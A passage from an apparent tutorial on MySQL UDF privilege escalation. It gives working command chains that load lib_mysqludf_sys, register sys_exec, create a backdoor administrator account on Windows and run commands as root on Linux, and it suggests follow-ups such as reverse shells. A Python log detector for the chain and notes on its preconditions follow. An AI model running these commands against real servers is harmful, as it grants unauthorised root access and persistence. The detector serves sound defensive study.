We will get into writing our own functions in later posts, but for now the precompiled UDF shared objects from SQLMap are great.
https://github.com/int0x33/sqlmap/tree/master/udf/mysql

mysql> USE mysql;
mysql> CREATE TABLE pwn(line blob);
mysql> INSERT INTO pwn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
mysql> SELECT * FROM mysql.pwn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
mysql> SELECT sys_exec("net user pwned pwn123! /add");
mysql> SELECT sys_exec("net localgroup Administrators pwned /add");

mysql> use mysql;
mysql> create table pwn(line blob);
mysql> insert into pwn values(load_file('/home/npn/lib_mysqludf_sys.so'));
mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');

user@box:/$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root)

You can now execute code as root; what more do you need? You can allow passwordless sudo for all commands, create a SETUID shell program in C, execute a reverse shell, and so on, whatever you want. Be creative.
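
The statement chain above (LOAD_FILE of a library, INTO DUMPFILE to a library path, CREATE FUNCTION ... SONAME, then a call to the new function) is distinctive enough to flag in query logs. The following detector is an added example, not code from the original post: it assumes statements are available one per line (for instance from the general query log or an audit plugin), the sample log is constructed from the Linux session above plus one benign query, and all function and variable names are hypothetical.

```python
import re

# Constructed sample: one statement per line, taken from the Linux session
# above, preceded by one benign export that must not be flagged.
SAMPLE_LOG = """\
select * from orders into outfile '/tmp/report.csv'
insert into pwn values(load_file('/home/npn/lib_mysqludf_sys.so'))
select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys.so'
create function sys_exec returns integer soname 'lib_mysqludf_sys.so'
select sys_exec('id > /tmp/out; chown npn.npn /tmp/out')
"""

LIB = r"[^'\"]+\.(?:so|dll)"  # quoted path ending in a shared-library extension
LOAD = re.compile(rf"load_file\s*\(\s*['\"]({LIB})['\"]", re.I)
DUMP = re.compile(rf"into\s+dumpfile\s+['\"]({LIB})['\"]", re.I)
UDF = re.compile(
    rf"create\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+"
    rf"\s+soname\s+['\"]({LIB})['\"]", re.I)

def basename(path):
    # Split on both separators so Windows and Linux paths are handled alike.
    return re.split(r"[\\/]", path)[-1].lower()

def detect(log_text):
    """Return (line_no, severity, message) findings for the UDF chain."""
    findings, dropped, udfs = [], set(), set()
    for no, stmt in enumerate(log_text.splitlines(), 1):
        if m := LOAD.search(stmt):
            findings.append((no, "medium", f"LOAD_FILE reads library {m.group(1)}"))
        if m := DUMP.search(stmt):
            dropped.add(basename(m.group(1)))
            findings.append((no, "high", f"library written via DUMPFILE: {m.group(1)}"))
        if m := UDF.search(stmt):
            name, lib = m.group(1).lower(), basename(m.group(2))
            udfs.add(name)
            # A UDF loaded from a file this log also saw written is the full chain.
            sev = "critical" if lib in dropped else "high"
            findings.append((no, sev, f"UDF {name} registered from {lib}"))
        elif any(re.search(rf"\b{re.escape(u)}\s*\(", stmt, re.I) for u in udfs):
            findings.append((no, "critical", "call to a UDF registered in this log"))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The chain only works when the account holds the FILE privilege, secure_file_priv does not restrict file reads and writes, and the server process can write to a directory it loads libraries from. The uid=0 output above also shows that mysqld itself was running as root, which is what turns a database foothold into full system compromise.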